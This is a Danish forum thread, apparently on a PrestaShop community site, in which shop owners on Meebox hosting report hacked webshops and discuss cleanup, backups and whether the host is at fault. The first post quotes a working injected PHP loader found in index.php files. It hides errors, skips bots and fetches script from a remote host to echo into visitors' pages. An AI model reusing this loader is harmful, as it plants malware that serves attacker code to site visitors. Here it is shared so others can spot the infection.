Jump to content

Så blev det min tur til at blive hacket med malware:-(


Prestafan1234

Recommended Posts

Jeg har efterhånden hjulpet flere med shops der var blevet hacket på den ene eller den anden måde. Nu blev det så min egen tur:-(

 

Sikke noget møg at opdage at min shop er blokeret af Google pga. malware. Jeg kunne ikke umiddelbart se nogen problemer, men efter at have kigget mine filer slavisk igennem fandt jeg 5-6 index.php filer der var tilføjet kode i ala dette (men forskellig i alle filerne):

#3ded54#
error_reporting(0); ini_set('display_errors',0); $wp_z27513 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_z27513) && !preg_match ('/bot/i', $wp_z27513))){
$wp_z0927513="http://"."meta"."header".".com/header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_z27513);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_z0927513);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_27513z = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_27513z,1,3) === 'scr' ){ echo $wp_27513z; }
#/3ded54#

Nu har jeg ryddet op og fjernet kode i filer og sendt en anmodning af sted til Google om, at min side nu er renset. Men for pokker hvor er det bare irriterende, og det er jo ikke godt at vide, hvornår min side kommer op at køre igen og hvad der sker med rankeringer m.m...

 

Men det jeg finder mest bekymrende er, at sikkerheden åbenbart ikke er god nok. Jeg bruger et megastærkt kodeord til FTP og alligevel var det ikke nok. Så slog det mig: De andre jeg har hjulpet med hackede shops var også alle hostet hos Meebox. Bekymrende. Mit WordPress site der ligger på et andet webhotel hos Meebox blev også hacket sidste efterår.

 

Jeg laver shops for mange kunder, der benytter UnoEuro og her har jeg endnu ikke set en hacket shop. Det kan være tilfældigt, men alligevel er jeg nu lidt bekymret for, om det er godt nok - selv om jeg altid roser Meebox til skyerne, er der noget der nager lige nu :-(

 

Jeg håber, min shop kommer op at køre snarest - og forresten, filerne var rettet den 5. januar - og Google opdagede det i går og blokerede i eftermiddag. Så hvis du ligger på Pro14 hos Meebox skal du måske lige se, om der er sket nogle ændringer i nogle af dine filer, som du ikke selv har lavet fornylig.

Link to comment
Share on other sites

Hej ANN. Er det jojoba? Den ser da fin ud. Ja det er surt. Jeg har ikke været hacket. Men jeg har haft adskillige diskusioner med Meebox om stabiliteten på databaseserveren på PRO21 hele december måned. Nedetiner på 4 til ? 5 til 6 gange i december. Måske er Meebox ikke så godt som vi tror og anbefaler herinde.

Link to comment
Share on other sites

Vi har lige været i kontakt med Meebox og fik følgende svar:

 

"Hej ,

Nu er det sådan at det ikke er serveren der er blevet hacked, det er selve websitet som de hacker og kommer ind igennem, serveren har det som sådan fint og er ikke hacked.

Det skyldes som oftes gamle eller ikke opdaterede CMS eller plugins osv, eller dårlig kode, det er meget sjældent at det er serverens skyld at den slags sker.

De bedste hilsner / Best Regards,

Kim Boldig
Support Manager "

 

Så iflg. Meebox kan det altså ikke være dem der bliver hacket. - Så er den ged vel barberet?

Link to comment
Share on other sites

Ja, det var også afhængigt af browser hos mig først, men ikke længere. Og min shop er stadig inficeret - så det er helt galt. Nu er der rettet i .js filer. Jeg har også fået samme besked fra Meebox om, at det ikke er dem der er hacket, men min shop. Hvordan ved jeg ikke.

 

Jeg kom først sent hjem i dag og opdagede, at den stadig er gal, og jeg vil derfor indlæse en ældre backup af shopfiler, men der findes kun en fra i går, hvilket ikke hjælper. Så nu venter jeg på hjælp fra Meebox, om de har en ældre backup liggende. Fed start på ferie:-(

Link to comment
Share on other sites

Kan I ikke skrive lidt om hvordan problemet optræder i front end. Jeg har umiddelbart ikke nogle ændrede filer. Så forhåbentlig er jeg ikke ramt. Men et hint om hvad fo opfører sig ville være dejligt.

Link to comment
Share on other sites

Det ser sådan ud - og da jeg har ikke har fået svar på Meebox mht. en ældre backup, har jeg lige brugt tre timer på igen at gennemgå alle filer. Der er skrevet i index.php filer samt næsten samtlige .js filer i shoppen (og det er mange skal jeg hilse og sige). Jeg håber, jeg har fanget dem alle, men problemet er, at man ikke på en overliggende mappe kan se, om der er rettet noget i undermapper - så det er ind på alle mapper samt undermapper og tjekke fildatoer. ZZZzzzzzz

post-59716-0-28622400-1389911081_thumb.jpg

Edited by Prestafan1234 (see edit history)
Link to comment
Share on other sites

, men problemet er, at man ikke på en overliggende mappe kan se, om der er rettet noget i undermapper - så det er ind på alle mapper samt undermapper og tjekke fildatoer. ZZZzzzzzz

 

Du kan søge filer med Filezilla (Under server/søg filer på fjernsted) Du kan bl.a. søge på public_html og efter ændringsdatoen på alle filer :). Datoformatet er åååå-mm-dd.

 

Jeg har rettet i alle filer nu, men det har desværre ikke løst problemet.

 

Vi står alligevel for at skulle have opgraderet shoppen, så at gøre det nu er vist et meget godt tidspunkt.

Link to comment
Share on other sites

Hej Prestafan1234!

Det lyder da godt nok bekymrende. Vi vil meget gerne høre fra dig så vi sammen kan få arbejdet henimod en løsning. Du skal være mere end velkommen til at kontakte vores support-team, som herefter vil vende tilbage dig hurtigst muligt  :-) Du kan komme i kontakt med vores support-team her: http://meebox.net/da/support/

Jeg er sikker på at vi sammen hurtigst muligt kan finde en løsning på dine problemer - det vil vi i hvert fald gøre vores for sker!

 

Mvh
Casper Ackermann
Community Manager, Meebox.net.

Edited by Meebox (see edit history)
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...